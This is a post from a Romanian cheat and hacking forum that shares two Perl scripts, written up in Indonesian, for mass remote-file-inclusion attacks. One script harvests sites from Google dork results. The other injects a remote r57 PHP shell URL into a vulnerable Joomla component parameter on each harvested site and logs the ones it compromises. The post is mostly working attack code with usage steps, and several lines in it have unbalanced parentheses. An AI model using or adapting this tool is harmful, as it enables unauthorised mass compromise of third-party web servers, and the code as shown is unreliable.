MANGACS TEAM
All for Counter strike 1.6 and more WWW.MANGACS.3XFORUM.RO WWW.MANGACS.3XFORUM.RO WWW.MANGACS.3XFORUM.RO WWW.MANGACS.3XFORUM.RO FREE DOWNLOAD - Filme noi 2016 filme noi filme comedie filme horror filme de groaza filme aventura filme actiune filme desene animate download filme gratis filme noi , filme thriller , filme gratis , jocuri full download , jocuri gratis , jocuri full , muzica noua , muzica romaneasca , hacking , torrent , jocuri free download , free download cfg silent aim ,dll , aimbot for counter strike 1.6 free download, scripts aim , eac , voiplay , Vac : WWW.MANGACS.3XFORUM.RO WWW.MANGACS.3XFORUM.RO FREE DOWNLOAD Cheat counter strike eac3 vac3 aimbot dll yahoo facebook hack aegiss
Lista Forumurilor Pe Tematici
MANGACS TEAM | Reguli | Inregistrare | Login

POZE MANGACS TEAM

Nu sunteti logat.
Nou pe simpatie:
BrianaS 24 ani
Femeie
24 ani
Bucuresti
cauta Barbat
26 - 57 ani
MANGACS TEAM / Hacking Tools / Google Mass Remote File Inclussion Scanner Moderat de dIeZz # 1337
Autor
Mesaj Pagini: 1
dude
Pe lista neagra

Inregistrat: acum 12 ani
Postari: 250
Google Mass Remote File Inclussion Scanner
-------------------------------------------
By : LoneEagle


    Gw hanya bisa geleng - geleng kepala dengan banyaknya advisories
Remote file inclussion baik di securityfocus atau milw0rm, ga terasa
advisories security hanya layaknya mainan anak kecil yang malas
menganalisa code, terbukti dengan banyaknya advisories yang isinya
hanya google dork : "blablabla", what kind of lamme advisories!!

    Ahh, gw ga peduli dengan semua itu gw cuma mo share google mass
RFI scanner dari pada nyari bug di CMS (kan uda banyak yang nyari )
Cara pakenya sederhana aja
1. Siapin r57shell sebagai phpshell untuk inject
2. perl lwpgoogle.pl <dork>
3. perl massinject.pl <file_output_lwpgoogle>


=========================== lwpgoogle.pl ==============================


#!/usr/bin/perl
#Reference :
#http://geocities.com/iko94/
#http://www.troubleshooters.com/codecorn/littperl/perlreg.htm

print "Grabbing website through google\n";
print "Code By LoneEagle\n";
print "http://kandangjamur.net\n";

if(!$ARGV[0]){
  print "Usage #perl $0 <dork>\n";
  exit;
}

require LWP::UserAgent;
use HTTP::Message;

$proxy='http://140.247.60.123:8888/';
$dork=$ARGV[0];
$ua = LWP::UserAgent->new;
$ua->timeout(30);
$ua->agent("MSIE/6.0 Windows";
$ua->proxy(http => $proxy) if defined($proxy);
$counter=0;
print "Pencarian menggunakan kata kunci : $dork\n";
$hasil="";
while($hasilx !~ /hasil penyajian/)
{
  $googleurl="http://www.google.co.id/search?q=$dork&hl=id&lr=&start=$a&sa=N";
  $grabresponse = $ua->get($googleurl);
  $counter=$counter+10;
  if (!($grabresponse->is_success)) {
  print ($grabresponse->status_line. "  Failure\n";
  } else {
    @hasil = $grabresponse->as_string;
    $hasilx="@hasil";
    sleep 1;
    #print "$hasilx";
    if($hasilx =~ /tak cocok/)
    {
      print "Ga ada hasil boz\n";
      exit;
    }
 
    while($hasilx =~ m/<a class=l href=".*?" on.*?<\/a>/)
    {
      $hasilx =~ s/<a class=l href="(.*?)" on.*?<\/a>/$1/;
      $hell = $1;
      print "$hell\n";
      open(f,">>google_log.txt";
      print f "$hell\n";
      close(f);
    }
    $a+=10;
  }
}
print "\nSilakan liat hasilnya di google_log.txt\n";


============================ massinject.pl ===============================

#!/usr/bin/perl
#Reference :
#http://geocities.com/iko94/
#http://www.troubleshooters.com/codecorn/littperl/perlreg.htm
#http://www.tizag.com/perlT/perlarrays.php

print "Mass Remote File Inclussion\n";
print "Code By LoneEagle\n";
print "http://kandangjamur.net\n";

if(!$ARGV[0])
{
  print "Usage #$0 <google_file>\n";
  exit;
}

require LWP::UserAgent;
use HTTP::Message;

#KONFIGURASI MASS INJECTION
#DEFINISI VULNERABILITY (TAMBAIH DEWEK YOHH!!)
$vuln="components/com_calendar.php?absolute_path=";
#$vuln="components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=";
#$vuln="components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=";
#$vuln="components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=";
#DAN LAINNYA TAMBAH NDIRI
#DEFINISI EVIL HTTP PHPSHELL
$phpshell="http://cenzurat.com/audit/mylocalakses/phpshell.txt?";
#AKHIR KONFIGURASI

$proxy='http://172.20.2.1:3128/';
$google_f=$ARGV[0];
$ua = LWP::UserAgent->new;
$ua->timeout(30);
$ua->agent("MSIE/6.0 Windows";
$ua->proxy(http => $proxy) if defined($proxy);

open(ff,$google_f);
@myurl=<ff>;
close(ff);

for($a=0;$a<$#myurl;$a++)
{
  $myurl[$a] =~ m/(http:\/\/.*?\/)index.php/;
  if($1 !~ //)
  {
    $gourl=$1.$vuln.$phpshell;
    #$gourl=$1.$vuln.$phpshell;
    #$gourl=$1.$vuln.$phpshell;
    #$gourl=$1.$vuln.$phpshell;
    print "Processing $gourl ...\n";
    $browse = $ua->get($gourl);
    if(!($browse->is_success)) {
      print($browse->status_line. "  Failure\n";
    } elsif(($browse->is_success)) {
      @hasil = $browse->as_string;
      $hasilx = "@hasil";
      if($hasilx =~ /http:\/\/undeva.void.ru\/download\/r57shell.txt/){
        print("  VULNERABLE..[OK]\n";
        open(f,">>vulnlog.txt";
        print f "$gourl\n";
        close(f);
      } else {
        print "Not Vulnerable\n";
      }
    }
  }
}

print "Finish RFI mass injecting, see result in vulnlog.txt file\n";


pus acum 12 ani
   
Pagini: 1  

Mergi la